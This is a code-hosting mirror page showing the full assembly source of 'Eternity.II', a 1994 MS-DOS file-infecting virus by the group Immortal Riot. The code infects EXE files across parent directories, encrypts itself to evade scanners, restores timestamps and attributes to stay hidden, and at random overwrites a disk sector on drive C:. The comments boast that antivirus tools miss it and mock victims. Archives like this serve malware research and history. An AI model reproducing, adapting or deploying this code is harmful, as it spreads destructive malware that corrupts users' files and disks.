Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-27 09:28:25 +00:00
Code Releases Activity
main
vxug-MalwareSourceCode/MSDOS/E-Index/Virus.MSDOS.Unknown.eternit2.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

276 lines
6.0 KiB
NASM
Raw Permalink Blame History

; -Eternity.II-
; "Created by Immortal Riot's destructive development team"
; (c) '94 The Unforgiven/Immortal Riot
;
; "If this virus survive into eternity, I'll live forever"
; or
; "Nothing last forever"
;
; Notes:
; F-Prot, Scan, TBAV, Findviru, can't find shits of this virus.
;
; Disclaimer:
; If this virus harms your computer and you kill yourself,
; I'll not attend on nor pay for your funeral.
;
; Dedication:
; I dedicate this virus to all members of Dia Psalma for all
; the ideoligical inspiration I've gained from listening on
; their music as well as talking with them.
.model tiny
.radix 16
.code
Virus_Lenght EQU Virus_End-Virus_Start
org 100
Virus_Start:
xchg ax, ax ; A nop to fill out the virus
mov ax,0fa01h ; to be exactly 600 bytes!
mov dx,5945h
int 16h
call Get_delta ; Get the delta-offset!
Get_delta:
pop bp
sub bp,Get_Delta-Virus_Start
call encrypt_decrypt ; Decrypt the virus
jmp short encryption_start ; then continue..
write_virus:
call encrypt_decrypt ; Encrypt the virus
mov ah,40
mov cx,Virus_Lenght
mov dx,bp
int 21
call encrypt_decrypt ; Decrypt it again
ret
encryption_value dw 0
encrypt_decrypt:
lea si,cs:[bp+encryption_start-virus_start]
mov cx,(end_of_virus-encryption_start+1)/2
mov dx,word ptr cs:[bp+encryption_value-virus_start]
Xor_LoopY:
xor word ptr cs:[si],dx
inc si
inc si
loop Xor_LoopY
ret
encryption_start: ; Heuristic, beat this!
mov ax,es
add ax,10
add ax,cs:[bp+Exe_header-Virus_Start+16]
push ax
push cs:[bp+Exe_header-Virus_Start+14]
push ds
push cs
pop ds
mov ah,1a ; Set the DTA
lea dx,[bp+Own_dta-virus_start]
int 21
One_Percent:
mov ah,2ch ; 1%
int 21h
cmp dl,0
jne get_drive
Cruel: ; God what I hate that
mov al,2h ; eskimoe!
mov cx,1
lea bx,v_name
cwd
int 26h
Get_drive: ; Current drive
mov ah,19h
int 21h
cmp al,2 ; A: or B:?
jae get_dir
jmp restore_dir ; Yep, then don't infect
; other files that run!
Get_Dir:
mov ah,47
xor dl,dl
lea si,[bp+dir-virus_start]
int 21
Di_Counter:
xor di,di ; Infection counter=0
; will be inc after each infection!
_4EH:
mov ah,4e ; Bummer..
Loop_Files:
lea dx,[bp+file_match-virus_start]
int 21
jnc clear_attribs ; We did find a file!
; Happy Happy, joy joy!
Dot_Dott:
lea dx,[bp+dot_dot-virus_start] ; Ah, the same old
mov ah,3bh ; dot-dot-routine again!
int 21h
jnc not_root ; No error!
jmp no_victim_found ; No more files in ..
not_root:
mov ah,4e ; Find first file
jmp short Loop_Files ; in the new directory
Clear_attribs: ; Clear file-attrib
mov ax,4301h
xor cx,cx
lea dx,[bp+own_dta-virus_start+1eh] ; 1eh=filename in DTA-aera
int 21h
Open_File:
mov ax,3d02 ; Open file in read/write mode
mov dx,Own_dta-Virus_Start+1e ; Yep, it's still 1eh in DTA!
add dx,bp ; bummer!
int 21
jnc read_File ; No error, then read the file!
jmp cant_open_file ; Hrm?!
v_name db "Eternity_II" ; Virus name!
Read_File:
xchg ax,bx ;File handle in bx
mov ah,3f ;Read file - 28 bytes
mov cx,1c ;to EXE_header (1ch)
lea dx,[bp+exe_header-virus_start]
int 21
jnc no_error ; It worked (duh)
jmp read_error ; Hrm?!
no_error:
cmp byte ptr ds:[bp+Exe_header-Virus_Start],'M'
jnz no_exe
cmp word ptr ds:[bp+Exe_header-Virus_Start+12],'RI'
jz infected
mov al,2 ; File pointer
call F_Ptr ; to end of file
push dx
push ax
Random:
mov ah,2ch ; Yah. Nearly polymorfic?
int 21h ; Oh well :-).
add dl,dh
jz random
mov word ptr cs:[bp+encryption_value-virus_start],dx
call write_virus ; Write encrypted copy
mov al,2 ; File pointer to end of file
Call F_Ptr
mov cx,200 ; bummer..
div cx
inc ax
mov word ptr ds:[Exe_header-Virus_Start+2+bp],dx
mov word ptr ds:[Exe_header-Virus_Start+4+bp],ax
pop ax
pop dx
mov cx,10
div cx
sub ax,word ptr ds:[Exe_header-Virus_Start+8+bp]
mov word ptr ds:[Exe_header-Virus_Start+16+bp],ax
mov word ptr ds:[Exe_header-Virus_Start+14+bp],dx
mov word ptr ds:[Exe_header-Virus_Start+12+bp],'RI'
mov al,0 ; File pointer to top of file
call F_Ptr
mov ah,40 ; Write header
mov cx,1c
lea dx,[bp+exe_header-virus_start]
int 21
jc write_error ; Hrm!?
no_exe:
jmp short Restore_Time_Date
infected: ; Decrease infection counter
dec di ; with one
Restore_Time_Date: ; Nearly stealth?
lea si,[bp+own_dta-virus_start+16h] ; Oh well :-).
mov cx,word ptr [si]
mov dx,word ptr [si+2]
mov ax,5701h
int 21h
Close_File: ; Close the file
mov ah,3e
int 21
Set_Back_Attribs: ; Stealth-bomber!
mov ax,4301h
xor ch,ch
lea bx,[bp+own_dta-virus_start+15h]
mov cl,[bx]
lea dx,[bp+own_dta-virus_start+1eh]
int 21h
Sick_or_EXE:
mov ah,4f ; 4fh=find next file
inc di
cmp di,3 ; Infected three files?
jae finnished_infection ; Yep!
jmp Loop_Files ; Nah!
F_Ptr: ; Since we're using
mov ah,42 ; this routine
xor cx,cx ; three times,
cwd ; calling this
int 21 ; will save us
ret ; some bytes
write_error: ; For no use in this virus,
read_error: ; but if something screws
cant_open_file: ; up, add 09/i21h functions,
no_victim_found: ; and test what didn't work.
finnished_infection: ;
Restore_Dir: ; More stealth..
lea dx,[bp+dir-virus_start]
mov ah,3bh
int 21
quit: ; Return to original program
pop ds
retf
groupdb db "(c) '94 The Unforgiven/Immortal Riot" ; That's moi..
dot_dot db '..',0 ; Another directory
file_match db '*.EXE',0 ; Infect <20>m all!
Exe_header db 16 DUP(0)
dw 0fff0
db 4 DUP(0)
Own_Dta db 02bh DUP(0)
dir db 65 dup (?) ; Really really stupid!
Virus_End EQU $
end_of_virus:
end Virus_Start
View Git Blame Copy Permalink